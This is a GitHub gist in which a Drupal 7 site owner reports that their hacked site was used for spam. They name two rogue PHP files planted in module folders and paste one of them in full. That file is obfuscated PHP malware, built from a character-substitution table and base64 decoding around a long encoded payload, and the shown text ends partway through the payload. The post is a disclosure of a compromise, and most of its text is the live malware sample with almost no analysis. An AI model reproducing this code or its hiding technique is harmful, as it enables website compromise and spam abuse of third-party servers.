Skip to content

Instantly share code, notes, and snippets.

@Strae
Created October 31, 2014 09:25
Show Gist options
  • Save Strae/38e36d0a54f60843dc66 to your computer and use it in GitHub Desktop.
Save Strae/38e36d0a54f60843dc66 to your computer and use it in GitHub Desktop.
Drupal 7 attack october 2014
My host just blocked one of my drupal7 websistes for being use for massive spam.
Analyzing my access log, i found two script being called often and there are not a Drupal scripts:
/sites/all/modules/i18n/i18n_block/stats7.php
/modules/file/bs63d8.php
/sites/all/modules/i18n/i18n_block/stats7.php:
<?php
$vNWZ3B7 = Array('1'=>'6', '0'=>'e', '3'=>'8', '2'=>'L', '5'=>'v', '4'=>'M', '7'=>'2', '6'=>'s', '9'=>'r', '8'=>'q', 'A'=>'l', 'C'=>'Y', 'B'=>'S', 'E'=>'K', 'D'=>'n', 'G'=>'T', 'F'=>'C', 'I'=>'y', 'H'=>'t', 'K'=>'G', 'J'=>'9', 'M'=>'k', 'L'=>'w', 'O'=>'H', 'N'=>'x', 'Q'=>'m', 'P'=>'E', 'S'=>'j', 'R'=>'O', 'U'=>'7', 'T'=>'4', 'W'=>'X', 'V'=>'D', 'Y'=>'d', 'X'=>'Z', 'Z'=>'I', 'a'=>'z', 'c'=>'R', 'b'=>'0', 'e'=>'B', 'd'=>'N', 'g'=>'h', 'f'=>'P', 'i'=>'o', 'h'=>'W', 'k'=>'c', 'j'=>'3', 'm'=>'A', 'l'=>'a', 'o'=>'f', 'n'=>'p', 'q'=>'F', 'p'=>'b', 's'=>'5', 'r'=>'g', 'u'=>'J', 't'=>'u', 'w'=>'U', 'v'=>'V', 'y'=>'Q', 'x'=>'1', 'z'=>'i');
function v5T7ETO($vQF6A3S, $vP8XOME){$v8YITRE = ''; for($i=0; $i < strlen($vQF6A3S); $i++){$v8YITRE .= isset($vP8XOME[$vQF6A3S[$i]]) ? $vP8XOME[$vQF6A3S[$i]] : $vQF6A3S[$i];}
return base64_decode($v8YITRE);}
$vC3WWUF = 'FQAQEKAak7vbEFcowPJGvq6zC7JMXBuYEBmQuzenkjdAYFrMWxefwxc'.
'pZQdxkjc5pvJgCjcnp7TzWBMruzCrlWdoX7J5XqJnkFrMWxdqwAXqw'.
'A6DwMvdGxcqWbqPcqZDWBMnFD6EFhv7ChLiCQqaXGCbW7cAC7JMXBrMWxefwxcpZQd5XKwzWBMnRLiuXWgnYFrnRLnJFrnnXzmil'.
'WdaXWyiuqJyGxdwhIub0WeAZAbnZFCQZFcowPJGvq6zYOALXBuYfGbz4BZnFD6EFWcskKwNWjdApQyiEG6EFhvTlWyi'.
'EG6EoynApOdAlhCrEKAak7vbEFcowPJGvq6zYOALXBuYEBmQuzmMWxefwxcpZDcskKwzWGbJZSZzEy'.
'nUFrnJFQv6k7vnXzmilWdaXWyiuqJyGxdwhIub0WeAZAbnEynUFrAAC7g5ZFcowPJGvq6zYOALXBuYRLiuXWgnYFrnRLnJFrnAkD'.
'u5kA3b4VyiEG6EFQXxpQdblhJtZKAaW7Y5p7colWmiuKALEynUFrMMX7J5XO4rfBeekDug0BrzdzTNR'.
'Vwt4S4s2zZ6ZFZT2SPaRFTN4GrtZzMUFrMEFhX5kQvgC7rrEFcDp7JMkIegkImMX7J5XFMEF'.
'W6EFyAnXzmikjcIkjcIEFcnkFLruKY5p7ynZFPJZPXeGqdqEyiuFW6EFyMukQvbYWutZqcBvwwUFrMuoyiuoyiuFrAI'.
'XWcxkQTrcMq4wbwUFDbEFQXxpQdblhJtZOcskKwNWjdApQyiEynUFrAnXzrglWdaXWyiuqJyGxdwhIuAphqnpO4z'.
'WBMEFyMuGxZrZhAak7vbEFcowPJGvq6zYKgAphvaZAbnFrMuFwJBZFqnkjdAYFrMWxefwxcpZQxAkjdgX7vaZAbn'.
'FrMuFwJBZFqnkjdAYFrMWxefwxcpZQXIp7xaZAbnFrMuFwJBZFqnkjdAYFrMWxefwxcpZQxglhNAkD4zWBMEF'.
'BMEFW6EFyAA0KAbEFMUFrAJFriulhCiX7vbW7xgX7ASWjqxpjcAkxJ'.
'DkK4iEBMEFW6EFyAQpjuAChdiEFcowPJGvFegkImMl7vsZVb+ZFcLpjdbEyiuFW6EFyMuuqJyGxdwhIc9XWAYZVbrkjcIlWeS'.
'k7Ngk7gAkIrMkKJaYFMUFrMuoyiuoyiEFBcAphqnpO4rfBemYhsaXWunChNn0Qw'.
'iCQqaXGCbW7cAC7JMXBrMWxefwxcpZQvHChA6kIuYEBMUFrMMYKgAphvaZVbryOvtk7vIlhq6lWnAEKugk7w7dq'.
'JMXhd5XKwiuqJyGxdwhIublKvHXW4zWBMnRLiuuKxAkjdgX7vaZVbryOvtk7vIlhq'.
'6lWnAEKugk7w7dqJMXhd5XKwiuqJyGxdwhIuHXWdaChYAkIuYEBMUFrMMXDu5pW4'.
'rfBemYhsaXWunChNn0QwiCQqaXGCbW7cAC7JMXBrMWxefwxcpZQXIp7xaZAbnEG6EFBcHChA6XWuaZVbryOvtk'.
'7vIlhq6lWnAEKugk7w7dqJMXhd5XKwiuqJyGxdwhIuHChA6XWuaZAbn'.
'EG6EFBcgpKAgk7vaZVbryOvtk7vIlhq6lWnAEKugk7w7dqJMXhd5XKwiuqJyGxd'.
'whIugpKAgk7vaZAbnEG6EFBcLCWdaXW4rfBemYhsaXWunChNn0QwiCQqaXGCbW7'.
'cAC7JMXBrMWxefwxcpZDegkjdAkIuYEBMUFriulhCilWdaXWyiuqJGcvuhcvZnEyiu0LiuFB'.
'cowbvBvMvBhIYyBqeowbv4czYYZVbrZz3zRImEFyMMWxdqwAXqwA6DwMvdGxcqWbqPc'.
'qZDWBmJZFZN4Skt4FTL2SPzRLiuFhAQEFqApWeb0BrMWxdqwAXqwA6DBqcwwqJCWb'.
'XfwAYewMcqcqJKGxZDWBMnFrMu0LiuFyMMWxdqwAXqwA6DBqcwwqJCWbXfwAYewMcqcqJKGxZDWBmJZ'.
'FZN4Skt4FTL2SPzRLiuFWbEFWbEFrAnXzgnkjdAYFrMWbXuGPvGEBMEFW6EFyAQpjuAChdiEFcocMA4cv4rCW4ruKHA0BmJ'.
'fzmMXQA6XBMEFyAUFrMuFBcQlhNApQqHXBmJZKq6YKvIW7xgCju5kIrMChNnCWdAkx6Ml7vsWBMUFrMuFBcQ'.
'lhNApQqHXBmJZKsxpvJHChdIpj4iuKXnpKvtChxAEG6EFyMuuKXnpKvtChxAZVbrYKvTYqJHChdIpj4iuKXnpKvtChxAEG6EFy'.
'MuuKXnpKvtChxAZVbr0KsxpvJHChdIpj4iuKXnpKvtChxAEG6EFyMuuqJKBwNqwx6Ml7vsWv6zpQqHXBuYZVbruKXnpK'.
'vtChxARLiuFWbEFWbEFrAnXzgApWeb0BrMXhxglhNaEBMEFW6EFyAA0KAbEFMUFrAJFriuXQJI'.
'XhqSlFmiuKvHChA6kIegkImMXDcAlhLrfGTruKvHChA6Eyiu0LiuFBcblKvHXBmJZFcblKvHXWdpCWuICWAokQqtXFrMYKgA'.
'phvaEvbUFrMuuOciXhxAZVbrChNbXWuophqSkQJaEFcblKvHXv6zYKgAphwzWBMUFrM'.
'uuOciXhxAZVbrpDvHW7xgCju5kIrMYKgAphwnRLiuFBcblKvHXBmJZOcA0Ocophq'.
'SkQJaEFcblKvHXBMUFrMuuOciXhxAZVbr0KsxpvJHChdIpj4iuOciXhxAEG6EFrMuuKxAk'.
'jdgX7wrfBmMphvak7qDXWdpCWuICWAokQqtXFrMphvak7qDXW4nWG6EFyMMphvak7qDXBmJZKq6YKvIW7xgCju5k'.
'IrMphvak7qDXv6zphvak7qDXBuYEG6EFyMMphvak7qDXBmJZKsxpvJHChdIpj4iuK'.
'xAkjdgX7wnRLiuFBcHXWdaChYAZVbrYKvTYqJHChdIpj4iuKxAkjdgX7wnRLiuFBcHXWdaChYAZVbr0Ksxp'.
'vJHChdIpj4iuKxAkjdgX7wnRLiuFB35uKxAkjdgX7wrfBeLCWdaW7xgCju5kIrMphvak7qDXBLruOegkjdAkI'.
'MUFrMuuKxAkjdgX7wrfBeQYKvnpqJHChdIpj4iuKxAkjdgX7w6ZFcQYKvnpFMUFriuFBcQkQJHZVbruKXIp7xa'.
'h7qIkQqsWjugpQyiuKXIp7xaEvbUFrMuuKXIp7brfBegpOcAkAJHChdIpj4iuKXIp7xpZQXIp7bzWBMUFrMuuKXIp7brfBetY'.
'hxophqSkQJaEFcQkQJHEG6EFyMMXDu5pBmJZOcA0OcophqSkQJaEFcQkQJHEG6EFyMMXDu5pBmJZ'.
'OgtYhxophqSkQJaEFcQkQJHEG6EFyMEFyAnXzmikjcIkjcIEFcQkQJH2FmzhbdvwxcfGv'.
'bzEBmJfBeKywNGcBMEFyAUFrMuFBcQkQJHZVbrXDu5pvJipjdbEFcQkQJHEG6EFyAJFrMuXhNaXyiuFW6EFyMuuKXI'.
'p7brfBeaYOuokQvLpKqSXBrzhbdvwxcfGvbz2FmzZzLruKXIp7bnRLiuFWbEFrMuuKxglhNAkzmJZFcHChA'.
'6XWuah7qIkQqsWjugpQyiuKxglhNAkD4nWG6EFrMuk7vtXqJHChA6EFcQkQJH2Fm'.
'MXhxglhL6ZFcblKvHXBLruKxAkjdgX7w6ZFcHChA6XWZnRLiuoynJFrnQYhsSYKA5pzeaXhsMW7xglhLiuKXIp7b'.
'6ZFcbpILruOdxCQi6ZFcbXWgb2FmMphqnpKvIEynUFzmrZFmMlKvgXFmJZFZzRLiEZF'.
'mrZFcxpzmJZOdbkDc5YWeLXWZiYhsnkhAMEOcnphwiEBMnRLiEZFmrZFciXhqMZFTJZFuKkQJHRzmMXDu5pvNtZS6EZFm'.
'rZFciXhqMZFTJZFuC2wxglhNAkSiruKxglhNAkANtZS6EZFmrZFciXhqMZFTJZFuBXWe'.
'60BxwpairuKXIp7xkpzZUFrirZFmruKgAChyr2SbrZMxnphwHvQ'.
'vIk7A5pSir4BTLWKTzRLirZFmruKgAChyr2SbrZMd5pDcApDyHvOALXGirpWv6YKALCWub27'.
'q6YKvIpQqblWXARIZUFzmrZFmMlKvgXFmtfBmzCQJxpQcgkDMJWFZH2BbH2BbH2BbHZzTMYhTtZALzWKskpzZUFzmrZFmE'.
'ZFmrZFcLpKqnpzmJZOdbkQALWjcgXj4iuOcA0OynRLirZFmruOngX'.
'ImJZFZH2BbH2BbH2BbH2Bbz2zcxpzTzWKsVp7sbXhsb2vcskKw1ZOcA0Oy5kKNglhTUZKdiCWuaXWyJ'.
'WFuuwb3HRVrxRBbNWFZUZKX5kQxgYVxQpKJjXhckpzZUFzmrZFmM0QqDZFTJZFuVp7sbXhsb2vc'.
'IChsaXQvI2wvtC7JMlhsDRzmjCQAbWKskpzZtuOe6ChAt2zukpANtZS6EZFmrZmirZFmruO'.
'ngXImtfBmz2BbH2BbH2BbH2BbHZzTMYhTtZANty7JtYKvtYFxw0WeA'.
'RzebXWgb27gbphLUZKdiCWuaXWyJWFuuwb3HRVrxRBbNWFZUWKTzRLirZFmruOngXImtfBmzy7JtYKvtYFx'.
'wkQqtk7XAkzxqpQd5XKAtXaird7unYqNtWKTMYKvTYqNtWKTzRLirZFmruOngXImtfBmz2BbH2BbH2BbH'.
'2BbHZzTMYhTtZzbHZS6EZFmrZmirZFmrlhCiC7JxpDyiuqJKBwNqwIMrfzmLEyirZFmr0LirZFmrZFmrZKX5kQvgC7riuqJKBwN'.
'qwIegkImMXQA6XBMEZFmrZFmrZFeUFzmrZFmrZFmrZFmrZKAQEKXnpKvoXWgnkjcaEFcQlhNAhIub'.
'pWeopQqHXBuYEBMEZFmrZFmrZFmrZFmr0LirZFmrZFmrZFmrZFmrZFmruKCrfBeQpjeApzrMXQA6Xv6zYKxL'.
'W7sgphwzWBLrZDuzZzMUFzmrZFmrZFmrZFmrZFmrZFmM0QqDZFTJZFZH2BbH2BbH2BbH2Bbz2zcxpzTzWKTzRLirZFmrZ'.
'FmrZFmrZFmrZFmruOngXImtfBmzy7JtYKvtYFxw0WeARzegkOe6lhdgYKA5p'.
'zJ5CjcAYFxaYOuAChbUZS6EZFmrZFmrZFmrZFmrZFmrZFc1Chkr2SbrZQsgphwJWFZz2zcQlhNAhIutCh'.
'xAZAbtZALzWKTzRLirZFmrZFmrZFmrZFmrZFmruOngXImtfBmzy7JtYKvtYFxwkQqtk7XAkzxqpQd5XKAtXanzCW'.
'dAdSckpzZUFzmrZFmrZFmrZFmrZFmrZFmM0QqDZFTJZFuVp7sbXhsb2wcnkje5k7AblhJtRQqbYKqSlKxApDyU'.
'ZS6EZFmrZFmrZFmrZFmrZFmrZFc1Chkr2SbrZQXnpKvtChxAfvLzZzTMXQA6Xv6zpQqHXBuY2zukZANtWKT'.
'zRLirZFmrZFmrZFmrZFmrZFmruOngXImtfBeSlOvtlxJakKNnYFgzCWdAdScoXhs'.
'Sp7cAEKXIXhqMEFcQ2FeQlhNAk7A1XBrMXQA6Xv6zYKxLW7sgphwzWBMnEBMtZANt'.
'ZS6EZFmrZFmrZFmrZFmrZFmrZKXSpKJaXBrMXzMUFzmrZFmrZFmrZ'.
'FmrZObEZFmrZFmrZFeJFzmrZFeJFrirZFmrlhCiyKxglhLiuOc52F'.
'mMkjvzlzLruOngXILruKgAChynEyirZFmr0LirZFmrZFmrZKAQEFqApWeb0BrMWxefwx'.
'cpujXAkQu5k7wDWBMnFzmrZFmrZFmrZFmrZKvSlK3rZAdqGMcqcFZUFzmrZFeJFzm'.
'rZFeApOdAFzmrZFeUFzmrZFmrZFmrlhCiZhvHkOcsEFcowPJGvq6DYQvICQJaXBYYEBMEZFmrZFmrZFmrZFmrXh'.
'dipImzcMquGFZUFzmrZFeJFDbEFQXxpQdblhJtZKq6YKvIW7xgCju5kIrMC7JtYKvtYF'.
'ME0LirZFmrkOuAXxJHCWcSlqJgpKLiuIdUEFT8EWbSvhMD2FmMC7JtYKv'.
'tYFLruKxgYKdiXW4nRLiEZFmrZKX5kzrMlBmJZVmUZFcnZVLrC7JxpDyiuKxgYKdiXWdp4vbnRImMlB69EyirZFmr'.
'0LiEZFmrZFmrZFmMpD4rfBeA0Oe6p7cAEFu3ZzLruKxgYKdiXWdp4vxpuKAYEG6EZFmrZF'.
'mrZFmMCaZrfBeSpjvtYFrMpD4nRLirZFmrZFmrZFcIChsMZVbrkQqtXFrL2'.
'FmiuK4IZFbr4BMnRLirZFmrZFmrZFcSp7sbXhsbZVbrkjcIWjuAkKNgC7wiZD'.
'6z2zcHCWcSlKvahaqYhIcnWBTzoBZ6ZFctkx6MkQqtXqb6ZFcSp7sbXhsbEG6EZFmrZObEZFmrZOu'.
'AYOvIpzmMC7JtYKvtYV6EoyiEXDvtCjcnp7TrYKvTYqJHChdIpj4iuKd5pDcApDynFD6EZFmrZOeIXhYophqbC7goChN6EFkS'.
'WqHwcvgwWFbihx61XKADlWy1Wvb9EvLHEqHpRQcnX7AbRAxYEIAkWB4D2FmMC7JtYKvtYFLruKxgYKdiXW4nRLiEZFmrZ'.
'KX5kzrMlBmJZVmUZFcnZVLrC7JxpDyiuKxgYKdiXWdp4qbnRImMlB69EyirZFmr0LirZFmrZFmrZFcHlhTrfBmMphqbC7'.
'gAkx6NWv6MlvbUFzmrZFmrZFmruKxg0FmJZFcHCWcSlKvahauYhIcnW'.
'G6EZFmrZFmrZFmMkQqtXFmJZOugpQyiuKxnpzLruKxg0FMUFzmrZ'.
'FmrZFmruOY5kQyrfBeDXhsAkQqbXvJjpjuMEFcIChsMEG6EFzmrZFmr'.
'ZFmruKd5pDcApDyrfBeLkQvDWjuAkKNgC7wiZz3z2DeIXhYokWv5YKwiuKxgYKdiXW'.
'dp4qxpuKAYEBTz2IZ6ZFcjpjuM2FmMC7JtYKvtYFLr4BMUFzmrZFeJFrirZF'.
'mrkOuAXxJHCWcSlqJgpKLiuIdkhxcqhqck2BgphanMlhYnYVnYWB6nWqbSuILruKd5pDcApDy6ZFcHCWcSlK'.
'vaEG6EFzmrZFeQpjZiuKMrfBmLRImMlBm3ZKd5YhsbEFcHCWcSlKvahaeYE'.
'G6ruKM9EIMEZFmrZO6EZFmrZFmrZFmMC7JxpDyrfBmMphqbC7gAkx6NWv6MlvbUFrirZFmrZFmrZFcjpjuMZFmJZKYApQvICWcAW'.
'jY5kQyiuKd5YhsbEG6EFzmrZFmrZFmruKd5pDcApDyrfBeLkQvDWjuAkKNgC7wiZz3z2DeIXhYokWv5YKwiuKxg'.
'YKdiXWdp4qxpuKAYEBTz2IZ6ZFcjpjuM2FmMC7JtYKvtYFLr4BMUFzmrZFeJFriEZFmrZOuAYOvIpzmMC7JtYKvtYV6E'.
'oyiEXDvtCjcnp7Tr0KsxpvJHChdIpj4iuKd5pDcApDynFD6EZFmrZOeIXhYophqbC7goChN6EFkSWqHRvwxk2BgphanMlhYnY'.
'VnYWB6nWqbSuILruKd5pDcApDy6ZFcHCWcSlKvaEG6EFzmrZFeQpjZiuKMrfBmLRI'.
'mMlBm3ZKd5YhsbEFcHCWcSlKvahaeYEG6ruKM9EIMEZFmrZO6EZFmrZFmrZFmMpDvHZVbru'.
'KxgYKdiXWdp4vxpuKAYRLirZFmrZFmrZFcHlhTrfBeLpjki4Gm6'.
'ZFctYhbr2BmNEG6EZFmrZFmrZFmMphqTZVbrkKJjEVPL2FmMpDvHEBmHZVPUFrirZFmrZFmrZFcIChsMZVbrkQqtXFrMphAt2F'.
'mMphqTEG6EZFmrZFmrZFmMC7JtYKvtYFmJZOdbkAJIXWe6ChdAEFcHCWcSlKvahaeYhIcnWBLruOugpQy6ZFcSp7sbXhsbEG6EZ'.
'FmrZObEZFmrZOuAYOvIpzmMC7JtYKvtYV6EoyiEXDvtCjcnp7TrpD'.
'vHW7xgCju5kIrMC7JtYKvtYFME0LirZFmrkOuAXxJHCWcSlqJgpKL'.
'iuIdkhxueGMck2BgphanMlhYnYVnYWB6nWFbihx61XKADlWy1Wvb9EvNYZIk6ZFcSp7sbX'.
'hsb2FmMphqbC7gAkIMUFrirZFmrXQJIEFcnZVbr4V6ruKMrfFeSpjvtYFrMphqbC7gAkx6'.
'LWBMUZFcnEI6nFzmrZFeUFzmrZFmrZFmruKxnpzmJZFcHCWcSlKvah'.
'aqYhIcnWG6EZFmrZFmrZFmMphqTZVbruKxgYKdiXWdp4AxpuKAYR'.
'LirZFmrZFmrZFcIChsMZVbrkQqtXFrMphAt2FmMphqTEG6EZFmrZFmrZFmMC7JtYKvtYFmJZOdbkAJIXWe6ChdAEFcHCWcSlKv'.
'ahaeYhIcnWBLruOugpQy6ZFcSp7sbXhsbEG6EZFmrZObEZFmrZOuAYOvIpzmMC7JtYKvtYV6EoyiEXDvtCjcnp7TrX7vtX'.
'WugYKvoY7JIXFrMpKvtXjciEynUFzmrZFmMC7ggkD4rfBmDChuSXKvQX7gnlQH6phs5kOqIkjcxYD'.
'AT0zkUFzmrZFmMpDvHy7ggkD4rfBeaYOu6XhTiuKdiCWuaEG6EZFmrZFcaYOunpQkrfBmDua6EZFm'.
'rZKX5kzrMlBmJZVmUZFcnZVLruKNApQYblV6ruKM9EIMEZFmrZO6EZFm'.
'rZFmrZFmMkjcIlhsDZFTJZOdxCDdbkzrMC7ggkD46ZOugpQyi4BLruKsxpwdiCWuaEBmHZVP6ZVPnRLirZFmroyirZFmrk'.
'QvbYWutZFcaYOunpQkUFDbEFQXxpQdblhJtZOegkjdophqSkQJaEFcSp7sbXhsb2FmMkKqak7vaEynUFzmrZFmMkKqakI'.
'mJZKqIkQqsWje5kFrMkKqak7vaEG6EZFmrZmirZFmrkQvbYWutZOdbkAJIXW'.
'e6ChdAEFupwPqGwxbz2FmMkKqakILruKd5pDcApDynRLnJFrnQYhsSYKA5pzeQYKvnpqJHChdIp'.
'j4iuKd5pDcApDy6ZFcQYKvnpFME0ImrZFmEZFmrZOuAYOvIpzeaYOuokQvLpKqSXBrzhbXwcwA4WBZ6ZFcQYKvn'.
'pFLruKd5pDcApDynRLnJFrnQYhsSYKA5pzenkxJnkFrMkjcIEBeUFzm'.
'rkQvbYWutZOeIXhYophqbC7riZzJ0Eq6N2GAYoq6N2GAYhamHRvx34v6L2GAYhamHRvx34A6L2GcYhamHRvx3'.
'4Svp4FbxWBMiWFTihamHRvx3haPHRvxp4FbsWWLNhamHRvxp4FbsWWLIhamHdqxp4FbsWWLIdv6L2GvYEBAU4jbM2IZ6uOdbkzM'.
'UFDbEFQXxpQdblhJtZKXIp7xolKJaYFrMC7JtYKvtYFME0LiEZFm'.
'rZFcipjdbZVbrkOuAXxJIXWe6ChdAEFk5WzgjYjY3XDcLEvLt27MD2FkD2PmMWxdqwAXqwA6D'.
'BqcwwqJZGxdwuxbnRLiEZFmrZKAQZFgnkxJnkFrMlKJaYFMnFz'.
'mrZFeUFzmrZFmrZFmrkQvbYWutZFcSp7sbXhsbRLirZFmroyirZFmrFzmrZFmMYKJ9XhsaZVbrXWgLpKJMXB'.
'rzyFZ6ZFcSp7sbXhsbEG6EFzmrZFmMC7JtYKvtYFmJZFcbp7HApDdp4qbr2zmz'.
'yFZr2zmMlKJaYFmtZFZ+ZS6EFzmrZFeIXWcxkQTruKd5pDcApD'.
'yUFDbEFQXxpQdblhJtZKvIkQJIWayLdFrnFD6EFhgAChcAkzrzBqcwwF3N2SPrdVmbZPs5YFeKpjvtXFZnRLiEFBcx'.
'kQMrfBeLkQvDWjuAkKNgC7wiuI3iWV3n2ziM2Ik6ZFkD2FmMWxdqwAXqwA6D'.
'wMvcvwvGvqJvwMMDWBmnRLiEFBcSp7sbXhsbZVbrCjvaYKJHW7gbYOeokQvNYhvaYVPiZQgbYOm12I3z2zcowbvBvMvBhIYZvqcy'.
'WbgfwxyDWBTz2bqKwhnVGMgtlVgBYOcKBGdhGWuFXKcXYaXIpQY20SY2cwPzEG6EFBcSp7sbXhsbZVbrkjcIWjuAkKNg'.
'C7wiZFZ5ywXclMdRBKsiRqubYPXu4xXdkMuMXqAjdDutXbH1dbHqyBZ6ZFcxkQM6ZFcSp7sbXhsbZFMUFriuXWgnYFrruKd'.
'5pDcApDyrEG6EoyiEFQXxpQdblhJtZKdxkjc5pvJiYOcLWjuAkWvAkjyNEFcLCWugpW4nFD6EZFmrZKAQEFmgZKAa'.
'W7qIkQqsEFcLCWugpW4nZFMEZFmrZO6EZFmrZFmrZFmMkKqIChxaZV'.
'brCWuICWMiFzmrZFmrZFmrZFmrZFYxkQLDZVb+ZFcLCWugpW46F'.
'zmrZFmrZFmrZFmrZFYHXWcip7yDZVb+ZFYOcvyDFzmrZFmrZFmrEG6EZF'.
'mrZObEZFmrZmirZFmrlhCiZFcLCWugpWdpujvIpFYYfGbDuImnZOuAYOvIpz'.
'eKywNGcG6EZFmrZmirZFmrlhCiZFPrlWdaXWyiuOegkQqHkx6Dphv'.
'blKJMuxbnZFMruOegkQqHkx6DphvblKJMuxbrfBmilWdaXWyiuO'.
'egkQqHkx6DXKqbCBYYEBCQlWdoCWuICWMiuOegkQqHkx6DXKqbCBYYEBMrfImDwPJGvFkrRzmDcbvwua6EZFmrZFcLCWugpWdpu7'.
'xAYKg5XFYYZVbrkjcIYKJxkOeAkzrMkKqIChxahIYHXWcip7yDWBMUFzmrZFenXzrrZ'.
'BenpAJgkDug0BrMkKqIChxahIYHXWcip7yDWBLrCWuICWMiubYqvFk6ZFYyGxdwuIMnZF'.
'MrkQvbYWutZPXeGqdqRImEZFmrZmirZFmr2Iirbu/crdFTb22y5HFbb2Sy5FVcrYKebC5ytJF1bC4rb'.
'2Zrb2/crdFLb22ytdFUbCay5YK2b2Mrb22ytdFbZFi5FzmrZFmMYWu6ZVbrkKqIk7voYWu6EF'.
'cLCWugpWdpujvIpFYYEG6EZFmrZKAQEFmgZKAak7vbEFcxkQNpujdSlKvH'.
'XBYYEBmnZFcxkQNpujdSlKvHXBYYZVbru7gbYOmDRLirZFmrlhCiZFPrlWdaXWyiuOvIpq6DkKqblFYYEBmnZF'.
'cxkQNpujegYKrDWBmJZFk5ua6EZFmrZKAQEFmgZKAak7vbEFcxkQNp'.
'u7g5kjyDWBMruzCrlWdaXWyiuOvIpq6DkKqblFYYEBmnFzmrZFeUFzmrZFmrZFmrl'.
'hCiZOdbkDe5kIrMYWu6hIYLCWciuxb6ZFk5uIMrEyirZFmrZFmrZO6EZFmrZFmrZFmrZFmruOvIpq6DlKJaYFYYZVb'.
'rkjvzkjcIEFcxkQNpujegYKrDWBLr4FLrkjcIkKJaEFcxkQNpujegYKrDWB'.
'LruI3DEBMUFzmrZFmrZFmrZFmrZFcxkQNpujegYKrDWBmJZOdxCDdbkzrMYWu6hIYLCWciuxb6ZOdbkDe5kIrMYWu6hIY'.
'LCWciuxb6ZFk5uIMnRLirZFmrZFmrZObEZFmrZFmrZFeApOdAFzmrZFmrZFmr0LirZFmrZFmrZFmrZFmMYWu6hIYipj'.
'dbuxbrfBmMYWu6hIYLCWciuxbUFzmrZFmrZFmrZFmrZFcxkQNpujegYKrDWBmJZFk5ua6uF'.
'zmrZFmrZFmroyirZFmroyirZFmruOvIpq6DkKqblFYYZVbrkOuAXxJIXWe6ChdAEFZ5hxNk2xb92IZ6ZF'.
'Z5ZzLruOvIpq6DkKqblFYYEG6EZFmrZKAQEFenkjdAYFrMYWu6hIYNYhvI0BYYEBm'.
'nZFcxkQNpujegYKrDWBmtfBmzfj6MYWu6hIYNYhvI0BYYoBZUFzmrZFmEZFmrZFcLpjubZVbrlWdaX'.
'WyiuOegkQqHkx6DkKJIYFYYEBm/ZFcLCWugpWdpuje5kDyDWyirZFmrZFm'.
'rZFmrZFm1ZFrrlWdaXWyiuOvIpq6DkKJIYFYYEBm/ZFcxkQNpuje5kDyDWBm1ZFrMYWu6hIYaC7'.
'gAphwDWGbJu7gbYOeaua3bdV41RVmnZFMUFzmrZFmEZFmrZFcblhxApjv'.
'bZVbrlWdaXWyiuOegkQqHkx6DYKAHXhJxYFYYEBm/ZFcLCWugpWdpujcnphv5YWyDWBm1ZV4LRLirZFmrlhCiZFPrl'.
'WdaXWyiuOegkQqHkx6DkQvbYWutuxbnZFMruOegkQqHkx6DkQvbYWutuxbrfBmDC7J'.
'tYKvtYFkUFzmrZFmEZFmrZFcaC7gAphwrfBmMYWu6hIYaC7gAphwDWGbJu7gbYOeauIm/ZFYak7L12I3DRzkDR'.
'LirZFmruKXLZVbryKXap7d9pjeApzrMk7diXhxA2zcxkQNpu7g5kjy'.
'DWBLruOe5kDy6ZFcAkDutpILruKvIkDdbkzLruOcnphv5YWynRLirZF'.
'mrlhCiZFcQkFmnFzmrZFeUFzmrZFmrZFmr2IirGhJ1lhN6CBm82LirZFmrZFmrZKAQEFmgZKAak'.
'7vbEFcLCWugpWdpuxvaXWZHyhYApDyDWBMrEBmMkKqIChxahIYvk7vI2wqDXhsbuxbrfBmzGhJ1'.
'lhN6CB3x2SmrEKAylKJtXG6rvG6ryxevZKAylKJtXBefwImaWamrpKA9XBedCh4rGx4rhV6rXhTHYW4nZ'.
'PqLkKNAv7vzB7Ab2awIRFTNRFmiBbgwGwL6ZKNnl7wrc7vSl73nZqXAkDdnp7T5dFT'.
'LZPx5CQA6XB3jyG4b4BeGChXgkQM5dGZT2SP7ZS6EZFmrZFmrZFmEZFmrZFmrZFmMkQvNYhvaYFmJZF'.
'uUuOegkQqHkx6DphvblKJMuxxJZO6MYWu6hIYLCWciuxxJZPgwvqm54BTLW'.
'OukpzZUFzmrZFmrZFmruOuAkWvAkjyr2SbrZMg5kjy1ZO6MYWu6hIYipjdbuxxJWOukpzZUFzmrZFmrZFm'.
'ruOuAkWvAkjyr2SbrZAvaXWZHyhYApDy1ZO6MkKqIChxahIYvk7vI2wqDXhsbux'.
'xJZzTzWOukpzZUFzmrZFmrZFmrlhCiZKAak7vbEFcLCWugpWdpujuAXQvIXWZDWBMrEBmMk'.
'QvNYhvaYFmtfBmzwQvQXWuAkSir0IcLCWugpWdpujuAXQvIXWZDWWxkkANtZS6EZFmrZFmrZFenXz'.
'rrlWdaXWyiuOegkQqHkx6DC7J5l7AAuxbnZFMEZFmrZFmrZFeUFzmrZFmrZFmrZFmrZFcSp7J9lhwrfBmzZS6EZFm'.
'rZFmrZFmrZFmrlhCiZKAaW7qIkQqsEFcLCWugpWdpu7d5p7HnXBYYEBmnZOHQpjuAChd'.
'iEFmMkKqIChxahIYSp7J9lhwDWBegkImMlab+uOCrEBmMC7J5l7AAZFTJZFZMlabMYS6rZS6ruKd5p7H'.
'nXBmJZOdxCDdbkzrMC7J5l7AA2Vm62GZnRjbEZFmrZFmrZFmrZFmrXhNaXBmMC7J5l7AAZ'.
'VbruOegkQqHkx6DC7J5l7AAuxbUFzmrZFmrZFmrZFmrZKAQEFmMC7J5l7AAZGbDuImnZFcIXWqxXWdbZFTJZFuVp7J9lhw1ZFcSp'.
'7J9lhvkkANtZS6EZFmrZFmrZFeJFzmrZFmrZFmruOuAkWvAkjyr2SbrZMd5pQsACjcnp7T1ZKd6pjdAWOukpz'.
'ZUFzmrZFmrZFmrlhCiZFcLCWugpWdpu7xAYKg5XFYYfGbDwPJGvFkrEyirZFmrZFmrZO6EZFmrZFmrZFmrZFmrlh'.
'CiZKAak7vbEFcLCWugpWdpu7cgYKPDWBMruzCrlWdoCWuICWMiuOegkQqHkx6DXKqbCBYYEBmnFzmrZ'.
'FmrZFmrZFmrZO6EZFmrZFmrZFmrZFmrZFmrZKX5kQvgC7riuOegkQqHkx6DXKqbCBYYZPqGZFc9ZVb+ZF'.
'c7EyirZFmrZFmrZFmrZFmrZFmrZFmrZFcMCWcgZFTJZOvIpKvtC7JMXBrMlIMtuab'.
'D2DvIpKvtC7JMXBrMYzMtuICDRLirZFmrZFmrZFmrZFmrZFmrlhCiZOdxCDdb'.
